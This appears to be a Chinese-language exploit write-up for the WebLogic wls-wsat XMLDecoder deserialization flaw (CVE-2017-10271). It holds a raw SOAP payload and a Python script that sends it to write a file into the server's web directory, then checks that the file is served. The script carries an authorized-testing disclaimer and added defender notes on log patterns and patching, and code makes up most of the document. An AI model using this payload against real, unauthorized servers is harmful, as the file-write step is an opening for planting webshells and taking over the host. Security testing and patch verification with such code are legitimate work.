向 /wls-wsat/CoordinatorPortType 以 POST 方式提交如下 XML,并将 Content-Type 修改为 text/xml。
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.txt</string><void method="println"><string>weblogic_CVE-2017-10271</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
提交后,服务器会在 /bea_wls_internal/ 下生成 test.txt。
#coding=utf-8
import requests
import sys
#author 香香@chamd5
#声明:仅用于学习交流与授权测试,请勿用于非法用途,其后果与本人及团队无关
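def exp(url, file):
    """Check one WebLogic host for CVE-2017-10271 by writing a marker file.

    The request body is a SOAP envelope whose WorkContext header carries a
    java.beans.XMLDecoder document. That document opens a java.io.PrintWriter
    on a path under the bea_wls_internal web application, writes the line
    "CVE-2017-10271_test" and closes the writer. The function then issues a
    HEAD request for /bea_wls_internal/<file> and prints 'ok! ...' when the
    marker is served, or 'no!' otherwise.

    Args:
        url: Target as "host:port"; it is placed after "http://" unchanged.
        file: Plain file name of the marker (letters, digits, '.', '_', '-').

    Raises:
        ValueError: If ``file`` is not a plain file name.

    Notes for defenders:
        * The marker file is not removed by this script; delete it from the
          server once the check is done.
        * Requests to /wls-wsat/ whose SOAP header contains an XMLDecoder
          ``<java>`` element are the pattern to look for in HTTP logs.
        * CVE-2017-10271 was fixed in Oracle's October 2017 Critical Patch
          Update; where wls-wsat is not needed, removing or blocking the
          component closes this entry point as well.
    """
    import re  # local import: keeps the file's top-level import list unchanged

    # The name is interpolated into both the XML payload and a server-side
    # path, so anything other than a bare file name is rejected. This keeps
    # the check from writing outside the intended directory or altering the
    # XML structure.
    if file in ('.', '..') or not re.match(r'[A-Za-z0-9._-]+\Z', file):
        raise ValueError('marker file name must be a plain file name: %r' % (file,))

    headers = {'Content-type': 'text/xml'}
    xml = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/%s</string><void method="println"><string>CVE-2017-10271_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope> '''%(file)

    # Without a timeout, requests waits indefinitely on an unresponsive host.
    timeout = 10

    res = requests.post('http://%s/wls-wsat/CoordinatorPortType' % (url),
                        headers=headers, data=xml, timeout=timeout)
    # 404 on the endpoint means the wls-wsat component is not deployed.
    if res.status_code != 404:
        probe = requests.head('http://%s/bea_wls_internal/%s' % (url, file),
                              timeout=timeout)
        # Only a 200 shows the marker is actually served. The original
        # "!= 404" test also counted 403, 500 and redirects as a hit.
        if probe.status_code == 200:
            # Single-argument print(...) behaves the same on Python 2 and 3.
            print('ok! file_path: http://%s/bea_wls_internal/%s' % (str(url), str(file)))
            return
    print('no!')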
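if __name__ == '__main__':
    # Command line: python weblogic.py host:port filepath
    if len(sys.argv) < 3:
        # Single-argument print(...) behaves the same on Python 2 and 3.
        print('''
please use python weblogic.py host:port filepath
''')
        # Missing arguments are a usage error, so exit non-zero; the
        # original exited with status 0 here.
        sys.exit(1)
    exp(sys.argv[1], sys.argv[2])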
参考链接:
https://github.com/kylingit/blog-hugo/blob/master/content/blog/Weblogic-0day.md